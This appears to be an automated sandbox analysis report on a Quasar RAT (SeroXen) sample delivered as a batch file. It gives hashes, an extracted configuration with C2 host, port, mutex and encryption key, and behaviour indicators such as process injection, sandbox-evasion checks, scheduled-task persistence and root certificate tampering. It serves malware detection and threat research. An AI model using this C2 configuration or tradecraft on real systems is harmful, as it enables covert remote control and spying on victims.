quasar | 7de9346c81bcb5b91230450e2092f27851f5cffb1837058e611ac103974f680a

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 11:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.bat
Size

512KB
MD5

d188d8d8e859b13330551005efc1f6cb
SHA1

6e3e2c19174c7cd0e9a2c248c700cd25a7ee17da
SHA256

7de9346c81bcb5b91230450e2092f27851f5cffb1837058e611ac103974f680a
SHA512

1847acf391c3d7a21962ae19908af637f239edaab741d2c7dc9e876b04dea6f54b7d9d42ebf3634fff9283692b7ecb566e067368a77e618bb8b5ef402e33e59f
SSDEEP

12288:i7ET3QCkmortzhYOPdMa0cqLepCUBD5LSWjU2d:GY3QCk7hXdMaELkVjU2d

Score

10^/10

quasar seroxen execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

tue-jake.gl.at.ply.gg:29058

Mutex

$Sxr-xPAuDxLNyBmZ7S2WLJ

Attributes

encryption_key
Pw78RUs175dFrKD7lMwH
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
SeroXen
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3544-79-0x00000000071E0000-0x000000000724C000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 3440 created 616 3440 powershell.EXE winlogon.exe
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

19 3544 powershell.exe
22 3544 powershell.exe
24 3544 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1900 powershell.exe
3544 powershell.exe
4684 powershell.exe
Downloads MZ/PE file

description	pid	process	target process
PID 3440 created 616	3440	powershell.EXE	winlogon.exe

flow	pid	process
19	3544	powershell.exe
22	3544	powershell.exe
24	3544	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 2 IoCs

Processes:

Client.exeinstall.exe

pid process

1312 Client.exe
2508 install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

23 raw.githubusercontent.com
24 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 ip-api.com

pid	process
1312	Client.exe
2508	install.exe

flow	ioc
23	raw.githubusercontent.com
24	raw.githubusercontent.com

flow	ioc
18	ip-api.com

Drops file in System32 directory 10 IoCs

Processes:

svchost.exesvchost.exesvchost.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 3440 set thread context of 4864 3440 powershell.EXE dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 3440 set thread context of 4864	3440	powershell.EXE	dllhost.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2200 schtasks.exe

pid	process
2200	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 56 IoCs

Processes:

OfficeClickToRun.exepowershell.EXEsvchost.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715428612"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE

Modifies registry class 8 IoCs

Processes:

RuntimeBroker.exeExplorer.EXEsihost.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Client.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Client.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Client.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Client.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exeClient.exepowershell.EXEdllhost.exe

pid	process
1900	powershell.exe
1900	powershell.exe
4684	powershell.exe
4684	powershell.exe
3544	powershell.exe
3544	powershell.exe
1312	Client.exe
1312	Client.exe
3440	powershell.EXE
3440	powershell.EXE
3440	powershell.EXE
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe
4864	dllhost.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

4340 msedge.exe
4340 msedge.exe
4340 msedge.exe
4340 msedge.exe
4340 msedge.exe
4340 msedge.exe
4340 msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeIncreaseQuotaPrivilege	4684	powershell.exe
Token: SeSecurityPrivilege	4684	powershell.exe
Token: SeTakeOwnershipPrivilege	4684	powershell.exe
Token: SeLoadDriverPrivilege	4684	powershell.exe
Token: SeSystemProfilePrivilege	4684	powershell.exe
Token: SeSystemtimePrivilege	4684	powershell.exe
Token: SeProfSingleProcessPrivilege	4684	powershell.exe
Token: SeIncBasePriorityPrivilege	4684	powershell.exe
Token: SeCreatePagefilePrivilege	4684	powershell.exe
Token: SeBackupPrivilege	4684	powershell.exe
Token: SeRestorePrivilege	4684	powershell.exe
Token: SeShutdownPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeSystemEnvironmentPrivilege	4684	powershell.exe
Token: SeRemoteShutdownPrivilege	4684	powershell.exe
Token: SeUndockPrivilege	4684	powershell.exe
Token: SeManageVolumePrivilege	4684	powershell.exe
Token: 33	4684	powershell.exe
Token: 34	4684	powershell.exe
Token: 35	4684	powershell.exe
Token: 36	4684	powershell.exe
Token: SeIncreaseQuotaPrivilege	4684	powershell.exe
Token: SeSecurityPrivilege	4684	powershell.exe
Token: SeTakeOwnershipPrivilege	4684	powershell.exe
Token: SeLoadDriverPrivilege	4684	powershell.exe
Token: SeSystemProfilePrivilege	4684	powershell.exe
